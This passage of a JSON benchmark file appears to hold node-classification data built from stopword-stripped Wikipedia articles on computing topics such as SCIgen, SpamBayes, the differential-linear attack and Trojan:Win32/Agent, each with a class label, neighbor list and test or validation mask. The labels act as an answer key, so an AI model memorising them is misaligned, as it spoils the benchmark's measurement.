      11331,
      9157,
      3783,
      7247,
      9551,
      7122,
      9427,
      7132,
      2525,
      4451,
      5859,
      1260,
      1005,
      7788,
      7151,
      1776
    ],
    "mask": "Test"
  },
  {
    "node_id": 1652,
    "label": 0,
    "text": "SCIgen:scigen scigen computer program uses context-free grammar randomly generate nonsense form computer science research papers elements papers formed including graphs diagrams citations created scientists massachusetts institute technology stated aim maximize amusement rather coherence opening abstract rooter methodology typical unification access points redundancy 2005 paper generated scigen rooter methodology typical unification access points redundancy accepted non-reviewed paper 2005 world multiconference systemics cybernetics informatics wmsci authors invited speak authors scigen described hoax website soon received great publicity picked slashdot wmsci withdrew invitation scigen team went anyway renting space hotel separately conference delivering series randomly generated talks track organizer wmsci conferences professor nagib callaos 2000 2005 wmsci also sponsored institute electrical electronics engineers ieee stopped granting sponsorship callaos 2006 2008 submitting paper deliberate attempt embarrass wmsci authors claim accepts low-quality papers sends unsolicited requests submissions bulk academics scigen website states computing writer stan kelly-bootle noted acm queue many sentences rooter paper individually plausible regarded posing problem automated detection hoax articles suggested even human readers might taken effective use jargon pun root/router par mit-graduate humor least one occurrence methodology mandatory attribute paper apparent incoherence limited knowledge conclusion reliable gibberish filter requires careful holistic review several peer domain experts pseudonym herbert schlangemann used publish fake scientific articles international conferences claimed practice peer review name taken swedish short film der schlangemann cases published papers withdrawn conferences proceedings conference organizing committee well names keynote speakers removed websites refereeing performed behalf institute electrical electronics engineers also subject criticism fake papers discovered conference publications notably labbé researcher using pseudonym schlangemann cyril labbé grenoble university demonstrated vulnerability h-index calculations based google scholar output feeding large set scigen-generated documents citing effectively academic link farm 2010 paper using method author managed rank ike antkare ahead albert einstein instance",
    "neighbors": [
      8582,
      5098,
      2316,
      5278,
      10591
    ],
    "mask": "Test"
  },
  {
    "node_id": 1653,
    "label": 4,
    "text": "SpamBayes:spambayes spambayes bayesian spam filter written python uses techniques laid paul graham essay plan spam subsequently improved gary robinson tim peters among others notable difference conventional bayesian filter filter used spambayes three classifications rather two spam non-spam called ham spambayes unsure user trains message either ham spam filtering message spam filters generate one score ham another spam spam score high ham score low message classified spam spam score low ham score high message classified ham scores high low message classified unsure approach leads low number false positives false negatives may result number unsures need human decision work gone applying spambayes filter internet content via proxy web server",
    "neighbors": [
      3336,
      6762,
      8554,
      5612,
      8747,
      6094,
      4272,
      4725,
      9053
    ],
    "mask": "Test"
  },
  {
    "node_id": 1654,
    "label": 4,
    "text": "Differential-linear_attack:differential-linear attack introduced martin hellman susan k. langford 1994 differential-linear attack mix linear cryptanalysis differential cryptanalysis attack utilises differential characteristic part cipher probability 1 rounds—this probability would much lower whole cipher rounds immediately following differential characteristic linear approximation defined expect chosen plaintext pair probability linear approximation holding one chosen plaintext lower correct key hellman langford shown attack recover 10 key bits 8-round des 512 chosen plaintexts 80 chance success attack generalised eli biham et al use differential characteristics probability less 1 besides des applied feal idea serpent camellia even stream cipher phelix",
    "neighbors": [
      7556,
      2567,
      3084,
      2957,
      7056,
      658,
      660,
      1173,
      1941,
      4128,
      4389,
      10662,
      169,
      11185,
      8627,
      8628,
      2357,
      10806,
      1847,
      9528,
      2110,
      9541,
      10315,
      6863,
      8273,
      7635,
      212,
      9556,
      10963,
      11349,
      2265,
      7643,
      9697,
      8674,
      229,
      618,
      1898,
      881,
      7161,
      7034,
      892
    ],
    "mask": "Test"
  },
  {
    "node_id": 1655,
    "label": 4,
    "text": "Multi_Router_Traffic_Grapher:multi router traffic grapher multi router traffic grapher mrtg free software monitoring measuring traffic load network links allows user see traffic load network time graphical form originally developed tobias oetiker dave rand monitor router traffic developed tool create graphs statistics almost anything mrtg written perl run windows linux unix mac os netware mrtg uses simple network management protocol snmp send requests two object identifiers oids device device must snmp-enabled management information base mib look oids specified collecting information send back raw data encapsulated snmp protocol mrtg records data log client along previously recorded data device software creates html document logs containing list graphs detailing traffic selected devices server alternatively mrtg configured run script command parse output counter values mrtg website contains large library external scripts enable monitoring sql database statistics firewall rules cpu fan rpms virtually integer-value data",
    "neighbors": [
      8582,
      5612,
      6797,
      7983,
      5492,
      823,
      3133
    ],
    "mask": "None"
  },
  {
    "node_id": 1656,
    "label": 2,
    "text": "Universal_Audio_Architecture:universal audio architecture universal audio architecture uaa initiative unveiled 2002 microsoft standardize hardware class driver architecture audio devices modern microsoft windows operating systems three classes audio devices supported default usb ieee 1394 firewire intel high definition audio supports pci pci express starting windows vista microsoft requires computer audio device manufacturers support universal audio architecture order pass windows logo goal universal audio architecture solve common problem modern microsoft windows products inconsistent support audio due lack common system audio devices could describe capabilities operating system mention lack ability control capabilities audio device manufacturers creative labs realtek turtle beach others provide series control panels custom interfaces let user control device turn requires kernel-mode drivers user actions communicated hardware poorly written audio drivers common source system instability windows especially games make use extended audio card capabilities concerns prompted microsoft disable audio stack entirely default windows server 2003 uaa seeks resolve problems putting forth standardized interface audio devices follow ensuring device capabilities recognized used effectively windows without need additional drivers custom control panels also provides reasonable assurance audio device still able work many years road without requiring vendor-supplied drivers newer version windows another goal uaa provide better support multi-channel audio windows example multi-channel wma pro audio streams played without special driver support uaa intended complete replacement developing wdm audio drivers however cases may necessary otherwise uaa-compliant audio device expose capabilities done uaa windows continue fully support audio drivers use portcls avstream drivers 2004 microsoft provided first version uaa update windows 2000 service pack 4 windows xp service pack 1 windows server 2003 available contacting microsoft support directly however almost manufacturer supplied drivers contain uaa class driver windows xp service pack 3 also includes updated driver windows vista windows logo program requirements state machine shipped vista must include uaa-compliant audio device works without additional drivers",
    "neighbors": [
      10243,
      5643,
      4624,
      10769,
      9234,
      1043,
      537,
      540,
      3102,
      1055,
      9762,
      2083,
      8227,
      8740,
      1577,
      10281,
      4143,
      9263,
      3122,
      11316,
      1077,
      2101,
      8246,
      10812,
      3648,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      9813,
      10839,
      603,
      9819,
      2145,
      3170,
      622,
      9839,
      4210,
      7796,
      5754,
      4731,
      7290,
      9340,
      10879,
      5761,
      9348,
      5765,
      10886,
      2183,
      8841,
      5259,
      653,
      6797,
      2193,
      9874,
      10900,
      3224,
      4248,
      9377,
      3235,
      4771,
      6820,
      7846,
      1703,
      2221,
      10414,
      5300,
      2749,
      8391,
      200,
      9420,
      214,
      9943,
      9434,
      2782,
      2783,
      736,
      4321,
      6370,
      9442,
      4836,
      4326,
      2279,
      1770,
      11498,
      3308,
      3821,
      10991,
      10993,
      2804,
      3834,
      1791,
      8959,
      11519,
      6927,
      3856,
      9491,
      3351,
      5401,
      5913,
      8473,
      8985,
      8988,
      11546,
      4384,
      5413,
      2854,
      11559,
      10024,
      3881,
      10026,
      10029,
      7983,
      11570,
      1844,
      9525,
      11572,
      10039,
      6972,
      5952,
      3394,
      1348,
      844,
      3922,
      4439,
      5465,
      10079,
      11616,
      2402,
      4458,
      6506,
      3958,
      9593,
      2943,
      9609,
      1418,
      5003,
      5004,
      9612,
      8080,
      9114,
      11677,
      10654,
      8607,
      929,
      11683,
      430,
      6062,
      9655,
      6584,
      1978,
      2493,
      960,
      8132,
      6088,
      969,
      7629,
      3535,
      8659,
      1498,
      5594,
      478,
      8161,
      6114,
      6115,
      4074,
      9196,
      6637,
      4590,
      9709,
      11247,
      6641,
      3573,
      10229,
      5119
    ],
    "mask": "None"
  },
  {
    "node_id": 1657,
    "label": 8,
    "text": "SoapUI:soapui soapui open-source web service testing application service-oriented architectures soa representational state transfers rest functionality covers web service inspection invoking development simulation mocking functional testing load compliance testing commercial version soapui pro mainly focuses features designed enhance productivity also developed eviware software 2011 smartbear software acquired eviware soapui initially released sourceforge september 2005 free software licensed terms european union public license since initial release soapui downloaded 2,000,000 times built entirely java platform uses swing user interface means soapui cross-platform today soapui also supports idea eclipse netbeans soapui test soap rest web services jms amf well make http jdbc calls core features include soapui pro commercial enterprise version soapui pro adds number productivity enhancements soapui core designed ease many recurring tasks working soapui soapui given number awards include",
    "neighbors": [
      6338,
      10020,
      3558,
      4107,
      5612,
      8566,
      10486,
      6074
    ],
    "mask": "Test"
  },
  {
    "node_id": 1658,
    "label": 4,
    "text": "Context_filtering:context filtering context filtering anti-spam mail policy method deal contents mail rather uses context smtp connection decide whether mail accepted method usually prevents reception e-mail first place thus common anti-spam features like quarantine redirect delete applied method also distorts statistics anti-spam programs usually unknown many mails spam otherwise would received certain connection filtering context includes methods like dnsbl lookups domain ip blacklists etc method extremely low rate false positives false negatives plus side method usually saving bandwidth server utilization common context filter dnsbl filtering efficiency method depends blacklist used high volume mail sites recommended set local copies dnsbls choice fill dns zone transfers reduces permanent traffic external dns lookups dnsbls also allow certain amount queries day every ip address keep expenses bandwidth low",
    "neighbors": [
      8224,
      8130,
      2887,
      8202,
      9909,
      182,
      4793
    ],
    "mask": "Test"
  },
  {
    "node_id": 1659,
    "label": 6,
    "text": "USN_Journal:usn journal usn journal update sequence number journal change journal feature ntfs maintains record changes made volume confused journal used ntfs file system journaling windows 2000 released microsoft created ntfs version 3.0 included several new features improvements older versions file system one new system management feature useful certain types applications windows 2000 ntfs 3.0 partitions set keep track changes files directories volume providing record done various objects enabled system records changes made volume usn journal name also used describe feature one journal maintained ntfs volume stored ntfs metafile named extend\\ usnjrnl begins empty file whenever change made volume record added file record identified 64-bit update sequence number usn reason change journals sometimes called usn journals record change journal contains usn name file information change change journal describes changes took place using bit flags e.g usn_reason_data_overwrite therefore include data details associated change reason change journal used undo operations files within ntfs usn journal used file history feature introduced windows 8 determine files changed since last backup files changed added history",
    "neighbors": [
      2432,
      7106,
      9762,
      3692,
      7244,
      9420,
      2193
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1660,
    "label": 3,
    "text": "Non-maskable_interrupt:non-maskable interrupt computing non-maskable interrupt nmi hardware interrupt standard interrupt-masking techniques system ignore typically occurs signal attention non-recoverable hardware errors nmis may masked using proprietary methods specific particular nmi nmi often used response time critical interrupt never disabled normal system operation uses include reporting non-recoverable hardware errors system debugging profiling handling special cases like system resets modern computer architectures typically use nmis handle non-recoverable errors need immediate attention therefore interrupts masked normal operation system errors include non-recoverable internal system chipset errors corruption system memory parity ecc errors data corruption detected system peripheral buses systems computer user trigger nmi hardware software debugging interfaces system reset buttons programmers typically use debugging nmis diagnose fix faulty code cases nmi execute interrupt handler transfers control special monitor program program developer inspect machine memory examine internal state program instant interruption also allows debugging diagnosing computers appear hung older architectures nmis used interrupts typically never disabled required response time hidden signals examples include floppy disk controller amstrad pcw 8087 coprocessor x86 used ibm pc compatibles even though intel recommended connecting normal interrupt low battery signal hp 95lx original ibm pc nmi triggered parity error detected system memory reported external device either case pc would display error message halt later pc clones used nmi conceal hardware differences standard pc computers nmi would generated program attempted access incompatible hardware bios interrupt handler would translate program request match hardware actually present smm 386sl better way 8-bit home computers used nmi line permit warm start system locked typically would restore control registers known good values stored rom without destroying whatever data user might currently loaded commodore 8-bit machines restore key hooked directly indirectly nmi line 6502-series cpu reset would take place nmi handler routine rom detected run/stop also held restore struck combination commodore version three finger salute commodore also connected mos technology 6526 cia 2 c64 c128 processor nmi line part means software emulation 6551 acia accomplished atari 8-bit line used system reset button purpose debugging nmis appeared number forms including apple macintosh programmers button certain key combinations sun workstations introduction windows 2000 microsoft allowed use nmi cause system either break debugger dump contents memory disk reboot debugging nmis also used devices allow leisure users gamers manipulate running programs devices added button generate nmi romantic robot multiface popular accessory 1980s 8-bit 16-bit home computers peripherals small amount rom nmi button pressing button transferred control software peripheral rom allowing suspended program saved disk useful tape-based games disk support also saving games progress screenshots saved printed values memory manipulated—a cheating technique acquire extra lives example computers provide mechanism triggering nmis however many machines typically rackmount servers provide physical button specifically purpose machines may expose functionality via expansion card miles gordon technology disciple +d products zx spectrum featured nmi-producing magic button nintendo entertainment system nmi generated vertical blanking interval nmis often referred vblank interrupts occur frequent regular intervals code manipulates game graphics audio often executed inside nmi handler routine clearing 7th bit ppu 2000 register disables vblank interrupts setting enables",
    "neighbors": [
      10371,
      5000,
      6415,
      9105,
      6806,
      1176,
      5529,
      1058,
      4773,
      2987,
      9911,
      5823,
      9791,
      9665,
      6339,
      7243,
      9932,
      5457,
      7377,
      3157,
      9685,
      10969,
      602,
      4699,
      2525,
      3294,
      7269,
      3050,
      1515,
      5617,
      6129,
      499,
      7281,
      7284
    ],
    "mask": "Test"
  },
  {
    "node_id": 1661,
    "label": 5,
    "text": "WTCP:wtcp wtcp wireless transmission control protocol proxy-based modification tcp preserves end-to-end semantics tcp name suggests used wireless networks improve performance tcp wtcp replace tcp hosts placed proxy two communicating hosts wireless systems wtcp placed base station intermediate gateway source host mobile wireless host base station wireless transmitter receiver mobile host acts gateway internet host following highly simplified example happens mobile host source host tcp connection mobile host uses tcp send segment wtcp base station receives sends network eventually reaches awaiting host awaiting host might send acknowledgment back network base station transmits mobile host despite handling wireless-related errors wtcp effectively exactly regular tcp two edge hosts n't even aware wtcp exists instead replacing tcp completely wtcp works enhance tcp performance wireless accomplishes handling negative effects wireless channel including high bit error rates known occur bursts wireless medium detects wireless-related problems lost corrupted segments due multipath fading high ber use timeouts duplicate acknowledgments wtcp attempts mitigate problem retransmitting lost segment receives acknowledgment back mobile host received lost segments wait wtcp buffer first one confirmed received times packets sit wtcp buffer many milliseconds order avoid either tcp end host go congestion avoidance mode due tcp looking segment timestamp determining took long time arrive therefore wrongly assuming due congestion wtcp uniquely hides time spent packets wtcp proxy rtt estimation affected one study wtcp performance wireless wans wtcp showed improvement 20 -200 comparable tcp algorithms new reno vegas snoop",
    "neighbors": [
      10924,
      6524
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1662,
    "label": 4,
    "text": "Trojan:Win32/Agent:trojan win32/agent trojan win32/agent definition microsoft apple trojan downloader trojan dropper trojan spy first known detection goes back january 2018 according microsoft malware protection center trojan created steal data intercepting ip address system network traffic searching banking usernames passwords credit card data paypal information social security numbers sensitive user data.it malicious computer program removed windows system antiviruses like malware bytes microsoft security essentials norton mcafee webroot kaspersky sophos avast etc removed help network security activated security blocks virus installing win32/agent trojans observed perform following actions",
    "neighbors": [
      704,
      7809,
      10756,
      1417,
      10392,
      858
    ],
    "mask": "None"
  },
  {
    "node_id": 1663,
    "label": 7,
    "text": "HP_Cloud_Service_Automation_Software:hp cloud service automation software hp cloud service automation hp csa cloud management software hewlett-packard used companies government agencies automate management cloud-based it-as-a-service order provision retirement hp cloud service automation orchestrates provisioning deployment complex services databases middleware packaged applications i.e. erp exchange software speeds deployment application-based services across hybrid cloud delivery platforms traditional environments software part broad portfolio hp enterprise management software products aimed helping companies manage lifecycle deployment usage cloud computing whether public private clouds according national institute standards technology information technology laboratory “ cloud computing model enabling convenient on-demand network access shared pool configurable computing resources e.g. networks servers storage applications services rapidly provisioned released minimal management effort service provider interaction. ” many organizations adopting cloud computing allows access applications resources services internet “ as-needed ” “ per usage ” basis cost agility advantages department according january 2011 unisys poll nearly half u.s. companies consider cloud computing top priority cloud computing save departments money increase flexibility present challenges challenges include extra effort increased difficulty department complexity associated deployment ongoing management cloud infrastructure applications automation proper management important departments deploy cloud computing services challenges according international data corporation idc use distributed server/workload automation tools help lower capital power cooling costs tracking reclaiming virtual machines making staff efficient standardizing streamlining manual processes speed process provisioning resources enabling business users ability self-provision predefined resource function hp cloud service automation accelerate speed deployment application-based services across hybrid cloud delivery environment traditionally staff required patch update physical servers manually using hp cloud service automation organizations update thousands servers automatically hp cloud service automation allows departments move manage applications among in-house private cloud systems external public clouds traditional systems hp cloud service automation software also designed deliver unified security governance compliance across applications well physical virtual infrastructures software automates key processes one consistent approach resource management hp cloud service automation also allows departments dynamically monitor provision server storage network elements well applications meet needs current upcoming workloads addition solution allows automatically grow shrink allocated resources order meet quality service targets hp cloud service automation software component hp virtualsystem series integrated server storage networking infrastructures hp citrix hp-ux microsoft vmware virtual environments hp virtualsystem part hp converged systems portfolio system-based products use converged infrastructure specific workloads hp cloud service automation software also included hp cloudsystem cloud infrastructure hp combines storage servers networking software organizations build complete private public hybrid cloud computing environments may 2013 hp packaged version 10 hp operations orchestration version 10 hp server automation version 10 hp database middleware automation hp cloud service automation 3.2 single integrated package hp cloud service automation also available standalone software solution hp cloud service automation works hp operations orchestration hp server automation provide lifecycle automation hp operations orchestration integrated set software services helps automate distributed systems heterogeneous computing environments user organizations use hp oo link together separate applications create workflow across hp server automation used manage physical virtual servers lifecycle management platform according hp hp sa helps reduce administrator-to-server ratio 60",
    "neighbors": [
      4194,
      5384,
      5832,
      2901,
      8122
    ],
    "mask": "None"
  },
  {
    "node_id": 1664,
    "label": 5,
    "text": "Pale_Moon_(web_browser):pale moon web browser pale moon open-source web browser emphasis customizability motto browser way official releases microsoft windows linux unofficial build macos contributed builds various platforms pale moon fork firefox substantial divergence main differences user interface add-on support running single-process mode pale moon retains highly customizable user interface firefox version 4–28 era also continues support types add-ons longer supported firefox pale moon diverged firefox number ways version 26.5 final official release support windows xp version 27.9 final official release support windows vista end xp support quickly followed pale moon getting least two forks take recent pale moon code recompile xp new moon roytam1 mypal feodor2 official releases support older processors without sse2 instruction set however contributed build linux available supports older processors pale moon source code released mozilla public license 2.0 except parts relating branding ensure quality redistribution officially branded pale moon binaries permissible specific circumstances name logo trademarked project founder used without prior permission m.c straver project founder lead developer straver first official release pale moon 2009 rebuild firefox 3.5.2 tweaked compiler settings eventually scope project grew version 24 became true fork firefox 24 esr starting version 25 pale moon uses completely independent versioning scheme pale moon 27 major re-fork core browser code firefox 38 esr added http/2 directx 11 mse/dash javascript es6 capabilities add-on support remained almost entirely unchanged slight reduction jetpack compatibility 2017 team behind pale moon began unified xul platform uxp project uxp actively maintained fork historical fork point mozilla code firefox 52 esr significant modifications codebase updated web technology support creating number xul-based applications demonstrate develop refine platform straver used create new browser basilisk pale moon 28 released august 2018 first version built uxp thereby providing improved support web standards video pale moon android distinct development effort longer maintained first released 2014 straver announced following year would likely abandoned due lack community involvement final release 25.9.6 straver remarked role benchmark tests questionable stating ca n't used draw hard regularly even conclusions plain simple indication nothing serve well compare closely related siblings e.g firefox iceweasel different builds exact browser get relative performance difference two limited subset actually tested far goes br questionable role confirmed leading technology experts example google announced retiring octane benchmark 2017 2013 pale moon bit slower firefox clubcompy real-world benchmark browsers respectively scoring 8,168 9,344 points possible 50,000 2016 browser comparison test ghacks pale moon version 25 smallest memory footprint opening 10 different websites separate tabs however report pale moon scored bottom mozilla kraken google octane 32-bit robohornet tests second-to-last 64-bit robohornet benchmarks whilst browsers hung tests pale moon hung jetstream javascript benchmark current uxp versions pale moon score comparatively browsers benchmarks showing e.g significant difference sunspider benchmark compared firefox quantum",
    "neighbors": [
      513,
      6657,
      9736,
      2579,
      9747,
      6171,
      2076,
      9757,
      7713,
      10791,
      9770,
      2603,
      559,
      1075,
      2101,
      4661,
      3639,
      10808,
      3643,
      9275,
      64,
      9281,
      8771,
      5707,
      3578,
      10834,
      5205,
      6231,
      7255,
      8281,
      10841,
      6747,
      6237,
      1642,
      9834,
      10860,
      10861,
      5743,
      8303,
      8304,
      9841,
      115,
      9843,
      119,
      4728,
      9848,
      5754,
      637,
      1664,
      1666,
      2182,
      6791,
      6797,
      8854,
      11418,
      10910,
      8351,
      7340,
      1713,
      9394,
      9908,
      7861,
      9909,
      185,
      11449,
      4797,
      7364,
      11466,
      10956,
      7885,
      11469,
      9424,
      7889,
      5844,
      4310,
      4822,
      2777,
      8923,
      737,
      4326,
      4331,
      4844,
      5356,
      9451,
      1776,
      9459,
      11000,
      8443,
      9986,
      9987,
      5380,
      7943,
      1295,
      1807,
      7951,
      9491,
      2836,
      278,
      3350,
      10006,
      7965,
      1834,
      7983,
      823,
      7488,
      1347,
      1348,
      4423,
      10057,
      11082,
      2893,
      10078,
      11112,
      9579,
      8557,
      7543,
      7036,
      2943,
      6528,
      3971,
      3462,
      8584,
      3465,
      4490,
      6028,
      8588,
      10126,
      7572,
      10654,
      5026,
      9128,
      8618,
      9642,
      4013,
      944,
      5054,
      9152,
      4550,
      3015,
      6086,
      7629,
      4048,
      5078,
      479,
      482,
      10722,
      5605,
      487,
      8169,
      494,
      1520,
      7152,
      6133,
      5622,
      5114,
      2045,
      6143
    ],
    "mask": "Test"
  },
  {
    "node_id": 1665,
    "label": 4,
    "text": "Ruby_Nealon:ruby nealon ruby nealon english computer security researcher age 14 left high school pursue full-time bachelor degree university salford nealon best known publishing 45-second-long video game called watch paint dry onto steam database without approval verification march 2016 born manchester united kingdom nealon enrolled modules open university whilst studying elementary school enabling leave high school early start bachelor degree computer science university salford 14 nealon said interest computer security young age first vulnerability acknowledgement dating back 11 march 2016 nealon exploited chain technical social engineering vulnerabilities steam digital distribution platform allowing release content service store immediately bypassing review procedures put place valve developers service nealon released watch paint dry short rpg maker game featuring picture bedroom wall requiring skill decisions player nealon claimed emailed valve january responsibly disclose issues received response game quickly removed storefront nealon releasing technical details vulnerabilities used expressing discontent valve handled issue nealon able retain product keys game steam publicly sold platform high 40 despite typical gameplay lasting minute length",
    "neighbors": [
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 1666,
    "label": 2,
    "text": "MacApp:macapp macapp apple computer object oriented application framework classic mac os released 1985 transitioned object pascal c++ 1991 version 3.0 release offered support much system 7 new functionality macapp used variety major applications including adobe photoshop softpress freeway microsoft mfc borland owl based directly macapp concepts period ten years product periods little development followed spurts activity period symantec think class library/think pascal become serious competitor macapp offering simpler model much higher-performance integrated development environment ide symantec slow respond move powerpc platform early 1990s metrowerks first introduced codewarrior/powerplant system 1994 rapidly displaced macapp think primary development platforms mac even apple used codewarrior primary development platform copland era mid-1990s macapp brief reprieve 2000 2001 system transitioning carbon system macos x however demonstrating version worldwide developers conference wwdc june 2001 development cancelled october macapp direct descendant lisa toolkit apple first effort designing object-oriented application framework led larry tesler engineering team toolkit included larry rosenstein scott wallace ken doyle toolkit written custom language known clascal added object-oriented techniques pascal language initially development mac carried using cross-compiler lisa workshop mac sales effectively ended lisa sales effort began build new development platform mac became macintosh programmer workshop mpw part process clascal updated become object pascal lisa toolkit offered design notes became macapp writing mac program without application framework easy task time object-oriented programming field still relatively new considered somewhat suspect many developers early frameworks tended confirm suspicion large slow typically inflexible macapp perhaps first truly usable framework meanings term compiled applications quite reasonable terms size memory footprint performance bad enough make developers shy although simple first releases number follow-up versions quickly addressed main problems point around 1987 system matured useful tool number developers started using major projects point late 1980s market moving towards c++ time apple deep effort release system 7 number major new features decision made transition entirely new version macapp 3.0 would use c++ place object pascal move subject long heated debate proponents object pascal c++ usenet forums nevertheless 3.0 managed garner reasonable following release 1991 even though developer suite mpw growing outdated apple downsized entire developer tools group leaving macapp mpw understaffed one reasons downsizing apple long saga attempting introduce next great platform development almost always form cross-platform system sort first attempt bedrock class library created partnership symantec ran mac windows died lingering death parties eventually gave working one reasons problems creation opendoc developed cross-platform system competed directly bedrock attempts position bedrock opendoc platform nothing ever came developments taking place mpw macapp largely ignored important put developer resources new projects help reach market sooner bedrock failed opendoc found lukewarm reception mac left tools almost decade old could compete newer products third parties early 1990s competing frameworks grew real competitors macapp first symantec tcl garnered following metrowerks powerplant generally took entire market core developers macapp continued work system low activity level throughout 1990s apple official cross-platform projects collapsed late 1996 team announced would providing cross-platform version macapp soon apple purchased next announced openstep would apple primary development platform moving forward name cocoa cocoa already cross-platform time already ported six platforms far advanced macapp led strong protests existing mac programmers protested programs sent penalty box effectively abandoned wwdc'98 steve jobs announced negative feedback move cocoa addressed introduction carbon system carbon would allow existing mac programs run natively new operating system conversion metrowerks announced would porting powerplant framework carbon similar announcement made apple regarding macapp period remained core loyal macapp users grew increasingly frustrated apple behaviour late 1990s introduction cocoa grown outright dismissal product things bad group macapp users went far organize meeting wwdc '98 assumed name order avoid apple staffers refuse room meet ongoing support noticed within apple late 1999 new macapp team consisting members worked along tasked releasing new version included new apple class suites acs thinner layer c++ wrappers many new mac os features introduced openstep macapp 3.0 release xv released 28 august 2001 delight many however october product killed time forever support existing versions macapp officially ended carbon-compliant powerplant x ship 2004 today cocoa almost universal macos ios programming macapp kept alive dedicated group developers maintained enhanced framework since apple stopped supporting 2001 macapp updated fully support carbon events universal binaries unicode text mlte control databrowser control fsrefs xml parsing custom controls composite window drawer window hiview window custom windows macapp also c++ wrapper classes hiobject hiview also pascal version based mainly macapp-2 ported mac os x xcode features long unicode filenames streamed documents automatic byte-swapping macapp supports xcode ide fact wwdc 2005 apple announced transition intel cpus took single developer 48 hours update macapp macapp example apps support universal binaries mac os simple event handing system event structure passed operating system application event type like keypress mouseclick details location modifier keys held application decode simple information action user carried instance clicking menu command decoding could difficult running lists on-screen objects checking event took place within bounds macapp provided solution problem using command pattern user actions encapsulated objects containing event details sent proper object carry logic mapping event proper object handled entirely within framework runtime greatly decreasing complexity task role macapp internal machinery take basic os events translate semantically higher-level commands route command proper object macapp relieve author write code every program requires also side-effect design cleanly separated code commands user-facing actions handlers internal code work instance one might commands turn green turn red handled single function codice_1 program cleanly separated commands handlers known apple parlance factored factoring program particularly important later versions mac os starting system 7 system 7 introduced apple events system expanded original mac os event system much richer one could sent applications os particular application combined applescript system allowed events generated scripting code macapp 3.0 apple events decoded commands initiated direct user actions meaning developer n't write much code directly handle apple events major problem developers using earlier systems including macapp 2.0 separation often led apple event support left keeping role application framework macapp also included number pre-rolled objects covering basic mac gui—windows menus dialogs similar widgets represented within system unfortunately apple typically supplied lightweight wrappers existing internal mac os code instead providing systems usable real world instance codice_2 class offered standard text editor widget underlying textedit implementation severely limited apple often stated used professional applications result developers often forced buy add-on objects address sorts needs roll lack set professional quality gui objects considered one macapp biggest problems problem addressed release macapp r16 macapp r16 uses standard carbon controls macapp gui objects instance carbon introduced multilingual text engine mlte full unicode text long-document support r16 original codice_2 class superseded codice_4 uses mlte control",
    "neighbors": [
      1664,
      3462,
      8582,
      7307,
      6797,
      2062,
      9491,
      1812,
      3350,
      3734,
      9245,
      10654,
      3876,
      11559,
      9128,
      4777,
      8618,
      2603,
      5165,
      5677,
      3631,
      11442,
      692,
      576,
      1347,
      1348,
      8644,
      4550,
      8771,
      8524,
      7629,
      213,
      4822,
      9943,
      10841,
      9434,
      479,
      9569,
      2658,
      10470,
      6377,
      2282,
      8554,
      5612,
      9579,
      10478,
      5743,
      8303,
      2673,
      8304,
      10480,
      5492,
      8700,
      9848,
      5754,
      7292,
      2045,
      7806
    ],
    "mask": "Test"
  },
  {
    "node_id": 1667,
    "label": 4,
    "text": "SpamCop:spamcop spamcop email spam reporting service allowing recipients unsolicited bulk commercial email report ip addresses found spamcop analysis senders spam abuse reporting addresses ip addresses spamcop uses reports compile list computers sending spam called spamcop blocking list spamcop blacklist scbl spamcop founded julian haight 1998 individual effort reporting service became popular staff added scbl became useful commonly target ddos attacks lawsuits organizations listed scbl email security company ironport systems announced acquisition spamcop november 24 2003 remained independently run julian haight small staff volunteer help forum ironport agreed become division cisco systems january 4 2007 effectively making spamcop cisco service julian haight left approximately two years cisco acquisition spamcop views attempt stop spam without necessity governmental intervention lacks power government large isp may greater difficulty dealing spammers expertise well large bot networks control used cripple blue security massive ddos attack spamcop previously provided paid email accounts corporate email services ces august 9 2014 email email account holders ces announced september 30 2014 tuesday 6pm et current spamcop email service converted email forwarding-only spam filtered spamcop existing spamcop email users spamcop longer provide imap pop service date spamcop effective helping isps web hosts email providers identify accounts abused shut spammer finishes operations spamcop provides information reports third parties also working fight spam amplifying impact services beyond reach first-time spamcop reporters spamcop parsing reporting service requires reporter manually verify submission spam destinations spam reports correct people use tools automatically report spam report email spam report wrong people may fined banned verification requires extra time effort despite steps reports innocent bystanders happen isps may need configure spamcop send reports want see",
    "neighbors": [
      8202,
      7949,
      914,
      4883,
      5012,
      10263,
      8093,
      8224,
      10275,
      8747,
      4272,
      3145,
      10450,
      1495,
      3032,
      3673,
      9053,
      6762,
      1899,
      9588
    ],
    "mask": "None"
  },
  {
    "node_id": 1668,
    "label": 6,
    "text": "Concurrent_Versions_System:concurrent versions system concurrent versions system cvs also known concurrent versioning system free client-server revision control system field software development version control system keeps track work changes set files allows several developers potentially widely separated space time collaborate dick grune developed cvs series shell scripts july 1986 addition proprietary software developers cvs became popular open-source software world released gnu general public license regular development add features fix bugs past including regular builds test results new releases since 2008 cvs uses client–server architecture server stores current version project history clients connect server order check complete copy project work copy later check changes typically client server connect lan internet client server may run machine cvs task keeping track version history project local developers server software normally runs unix although least cvsnt server also supports various flavours microsoft windows cvs clients may run major operating-system platform several developers may work project concurrently one editing files within working copy project sending checking modifications server avoid conflicts server accepts changes made recent version file developers therefore expected keep working copy up-to-date incorporating people changes regular basis task mostly handled automatically cvs client requiring manual intervention edit conflict arises checked-in modification yet-unchecked local version file check operation succeeds version numbers files involved automatically increment cvs-server writes user-supplied description line date author name log files cvs also run external user-specified log processing scripts following commit scripts installed entry cvs loginfo file trigger email notification convert log data web-based format clients also compare versions request complete history changes check historical snapshot project given date revision number project-wide revision number cvs servers allow anonymous read access wherein clients may check compare versions either blank simple published password e.g. anoncvs check-in changes requires personal account password scenarios clients also use update command bring local copies up-to-date newest version server eliminates need repeated downloading whole project cvs also maintain different branches project instance released version software project may form one branch used bug fixes version current development major changes new features form separate branch cvs uses delta compression efficient storage different versions file works well large text files changes one version next usually case source code files hand cvs told store file binary keep individual version server storing files binary important order avoid corruption binary files cvs labels single project set related files manages module cvs server stores modules manages repository programmers acquire copies modules checking checked-out files serve working copy sandbox workspace changes working copy reflected repository committing update acquire merge changes repository working copy cvs designed dick grune developed cvs front end revision control system rcs older version control system manages individual files whole projects grune publicly released code june 23 1986 code eventually evolved current version cvs started brian berliner april 1989 later input jeff polk many contributors brian berliner wrote paper introducing improvements cvs program—which describes tool extended used internally prisma third-party developer working sunos kernel released benefit community gpl november 19 1990 cvs version 1.0 submitted free software foundation development distribution cvs supports distributed multi-site offline operations due unreliability computer networks existed time cvs evolved official recent announcements indicating project status development microsoft 